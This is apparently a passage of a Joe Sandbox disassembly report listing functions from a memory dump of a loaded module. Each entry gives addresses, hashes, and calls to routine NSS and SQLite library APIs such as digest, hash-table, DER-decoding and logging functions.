Opcode Fuzzy Hash: 5501cb47128c6dd54140df602d6fca9b82420ef51fbaff7586fe24cbd62293ae
Instruction Fuzzy Hash: 8D51CFB5A00602AFDB11DF25C985B5AB7B4FF08328F148674E81897E12E731F864CBD1

Function 6C724CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C72AB7F,?,00000000,?), ref: 6C724CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C72AB7F,?,00000000,?), ref: 6C724CC8
TlsGetValue.KERNEL32(?,6C72AB7F,?,00000000,?), ref: 6C724CE0
EnterCriticalSection.KERNEL32(?,?,6C72AB7F,?,00000000,?), ref: 6C724CF4
PL_HashTableLookup.NSS3(?,?,?,6C72AB7F,?,00000000,?), ref: 6C724D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C724D10

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

PR_Now.NSS3(?,00000000,?), ref: 6C724D26

Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C724D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C724DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C724E02

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 9eade404a8e13dfa4fa9b2232f993ad6bb35e7e66abba1e43261c39acb0a5f6a
Instruction ID: f5a25cb7bbef2e90dc8e50234d9b43a3a7e07876ed2cb0eddf4c44797607c386
Opcode Fuzzy Hash: 9eade404a8e13dfa4fa9b2232f993ad6bb35e7e66abba1e43261c39acb0a5f6a
Instruction Fuzzy Hash: F341E7B6E00101ABEB119F28ED49A6677B9FF1525CF094170ED0887B12FB35D919CBE2

Function 6C7289C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C72AE9B,00000000,?,?), ref: 6C7289DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C702D6B,?,?,00000000), ref: 6C7289EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C702D6B), ref: 6C728A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C702D6B,?), ref: 6C728A11

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 507f136df654851e55a7249cfd5a3468c9e8d213ab2f960f91dac7cf36ff25e8
Instruction ID: 8539c00872213152b3f0cfe2efe19f937efedfaa18b2a9a58c4c9b3353a43df9
Opcode Fuzzy Hash: 507f136df654851e55a7249cfd5a3468c9e8d213ab2f960f91dac7cf36ff25e8
Instruction Fuzzy Hash: CF112BF3A0030056FB0056746E89BAB7568EB1175DF080032ED099AB42FF2BC418C1F2

Function 6C702E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C702CDA,?,00000000), ref: 6C702E1E

Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C709003,?), ref: 6C75FD91
Part of subcall function 6C75FD80: PORT_Alloc_Util.NSS3(A4686C76,?), ref: 6C75FDA2
Part of subcall function 6C75FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C76,?,?), ref: 6C75FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C702E33

Part of subcall function 6C75FD80: free.MOZGLUE(00000000,?,?), ref: 6C75FDD1

TlsGetValue.KERNEL32 ref: 6C702E4E
EnterCriticalSection.KERNEL32(?), ref: 6C702E5E
PL_HashTableLookup.NSS3(?), ref: 6C702E71
PL_HashTableRemove.NSS3(?), ref: 6C702E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C702E96
PR_Unlock.NSS3 ref: 6C702EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C702EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C702EC5

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 0eedcd278129a1fb0d1eef6fce82c7630a4cf945cf2b87cc5783493a6345c99d
Instruction ID: 58fa96d8d33341c5d0edae5b4a8ab3f2c7ad9ed09335d6ee64da9117a3118c8d
Opcode Fuzzy Hash: 0eedcd278129a1fb0d1eef6fce82c7630a4cf945cf2b87cc5783493a6345c99d
Instruction Fuzzy Hash: 552107B2E40101A7EF111B25DD0DAAB3AB9EB5235DF140170ED1882712FB32D569C7E2

Function 6C6EFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C6EFD18
sqlite3_initialize.NSS3 ref: 6C6EFD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6EFD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C6EFD99
sqlite3_free.NSS3(00000000), ref: 6C6EFE3C
sqlite3_free.NSS3(?), ref: 6C6EFEE3
sqlite3_free.NSS3(?), ref: 6C6EFEEE

Strings

simple, xrefs: 6C6EFC79

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: daed3144ba34dc3fa538d517997786fc56f5a2dd4e61d240870586f75c73d74e
Instruction ID: a73b66d2906c763e0c731dcb41cdf67467ad543f51097fd0e9f48fc617743e4c
Opcode Fuzzy Hash: daed3144ba34dc3fa538d517997786fc56f5a2dd4e61d240870586f75c73d74e
Instruction Fuzzy Hash: 5491B5B0E062059FDB04CF55D880AAAFBF1FF89318F24C56AD8199B752D731E902CB95

Function 6C6F5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6F5EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F5EED

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F5ED1
unable to close due to unfinalized statements or unfinished backups, xrefs: 6C6F5E64
misuse, xrefs: 6C6F5EDB
API call with %s database connection pointer, xrefs: 6C6F5EC3
%s at line %d of [%.10s], xrefs: 6C6F5EE0
invalid, xrefs: 6C6F5EBE

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: 07d0e0508a83687ef75b41289a50a6352f45bf652285841c4fb3b93acced5756
Instruction ID: 993b2002747fdff1d6e2096486cac26014bf525d0b290649534c039adf4f7a5d
Opcode Fuzzy Hash: 07d0e0508a83687ef75b41289a50a6352f45bf652285841c4fb3b93acced5756
Instruction Fuzzy Hash: FA81B130B076119BEB198E15C848BAA77B2BF4270CF198269D8255BB51C730EC43CBED

Function 6C6DDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6DDDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DDE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DDE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C6DDEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6DDF78

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6DDE52, 6C6DDE81
database corruption, xrefs: 6C6DDE5C, 6C6DDE8B
%s at line %d of [%.10s], xrefs: 6C6DDE61, 6C6DDE90

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: db3017bd3fdb4a0d527e2ccdf42e4cc2ee91930417b68b7a5b5cad222e424a76
Instruction ID: ac46b0ca57a66bfc453108ebe0c7d21b207417f00092de4cc0b7030810110ab0
Opcode Fuzzy Hash: db3017bd3fdb4a0d527e2ccdf42e4cc2ee91930417b68b7a5b5cad222e424a76
Instruction Fuzzy Hash: 3281D9716043119FDB14EF25C880B6A77F1BF85308F16886DE89987B51E731F845CBA6

Function 6C68CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C68B999), ref: 6C68CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C68B999), ref: 6C68D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C68B999), ref: 6C68D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C68B999), ref: 6C7D972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68CFDD, 6C68D00E, 6C68D022, 6C68D033, 6C7D9780
database corruption, xrefs: 6C68CFE7, 6C68D013, 6C68D028, 6C68D039, 6C68D03E, 6C7D9786
%s at line %d of [%.10s], xrefs: 6C68CFEC, 6C68D018, 6C68D029, 6C68D03F, 6C7D978B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 6cc8122b79b5f0bc58e3f4e425b87eba7eb9f2da2313f15a692fc9941a7f228c
Instruction ID: 60c37a0a37bb024cfff0b1940b4e029f2b397d1828b1fb18dde6393b653b7cb8
Opcode Fuzzy Hash: 6cc8122b79b5f0bc58e3f4e425b87eba7eb9f2da2313f15a692fc9941a7f228c
Instruction Fuzzy Hash: B9615971A042209BD310CF29C900BA7B7F1EF95318F1986ADE4499BB42D376E847C7E5

Function 6C764DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C76536F,00000022,?,?,00000000,?), ref: 6C764E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C764F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C764F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C764FAE
free.MOZGLUE(?), ref: 6C764FC8

Strings

%s=%s, xrefs: 6C764F89
oSvl", xrefs: 6C764DFB, 6C764EF4, 6C764EC5
%s=%c%s%c, xrefs: 6C764FA9

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSvl"
API String ID: 2709355791-1883948470
Opcode ID: 221691c203c2a318b34de709888bce658b95a63137842f322950838bac3c94ec
Instruction ID: ae9ef4ba140676945009b22616c34bb4eee5df94caa45139dfee78e9cae2c2d2
Opcode Fuzzy Hash: 221691c203c2a318b34de709888bce658b95a63137842f322950838bac3c94ec
Instruction Fuzzy Hash: 07513831A452458BEF01CA6BC6B07FF7BF99F46308F188136EC94A7F41D32588499791

Function 6C78EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78EF6D

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

htonl.WSOCK32(00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78EFE4
htonl.WSOCK32(?,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78EFF1
memcpy.VCRUNTIME140(?,?,6C7AA4A1,?,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C7AA4A1,?,00000000,?,00000001), ref: 6C78F027

Strings

dtls13, xrefs: 6C78EF33

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 70fafa5c8eff8ea70eadb849587cfa1059ba36d1e1d12e8369c726b3ba5d8ed0
Instruction ID: 37b7c83d2a38bd6bfd8ada1fa92cbc269279eec9304f6ddcf4cd5809629ecc69
Opcode Fuzzy Hash: 70fafa5c8eff8ea70eadb849587cfa1059ba36d1e1d12e8369c726b3ba5d8ed0
Instruction Fuzzy Hash: 8E314475A02215AFC710CF28CE84B8AB7E4EF49358F158039E9189BB51E731E815CBE1

Function 6C70AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C70AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C829500,6C703F91), ref: 6C70AFD2

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

DER_GetInteger_Util.NSS3(?), ref: 6C70B007

Part of subcall function 6C756A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C701666,?,6C70B00C,?), ref: 6C756AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C70B02F
PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C70B046
PL_FreeArenaPool.NSS3 ref: 6C70B058
PL_FinishArenaPool.NSS3 ref: 6C70B060

Strings

security, xrefs: 6C70AFB8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 8557edba4ab10d03e67e8680cbd7df6e46847ec2f47d4311aecf4578b6b542f7
Instruction ID: b9411e84d05fd1ec948e9602e72e1c42252afae706242d57089ffcb825598352
Opcode Fuzzy Hash: 8557edba4ab10d03e67e8680cbd7df6e46847ec2f47d4311aecf4578b6b542f7
Instruction Fuzzy Hash: 4E314CB06043009BD7208F14DE48BAA77E4AF8676CF504A69F8745BBC1E736A309C797

Function 6C74CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C74CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C74CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C74D079

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 3b5166052e4fe789b73349b869cde41bceacf460ffecf59a3c84ef3a51779d4e
Instruction ID: 9c91fa441209e0453d0a3962e0650bcf71c919b157c09a8c164bbd1191e66a4b
Opcode Fuzzy Hash: 3b5166052e4fe789b73349b869cde41bceacf460ffecf59a3c84ef3a51779d4e
Instruction Fuzzy Hash: B2C1A0B1A002199BDB20CF24CD84BDAB7B4BF48318F1481A8E94897751E775EE99CF94

Function 6C73DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C7497C1,?,00000000,00000000,?,?,?,00000000,?,6C727F4A,00000000), ref: 6C73DC68

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C727F4A,00000000,?,00000000,00000000), ref: 6C73DFAA

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 045038d18f7157e9b3e3757dc5a5d9422d0e9111fa156f77bd76b1d1039698b5
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 1D8138B06A25258BFB104E29CA903597ADADB70349F20A43ED91DCAFD3E774C494C60E

Function 6C713C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C713C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C713C94

Part of subcall function 6C7095B0: TlsGetValue.KERNEL32(00000000,?,6C7200D2,00000000), ref: 6C7095D2
Part of subcall function 6C7095B0: EnterCriticalSection.KERNEL32(?,?,?,6C7200D2,00000000), ref: 6C7095E7
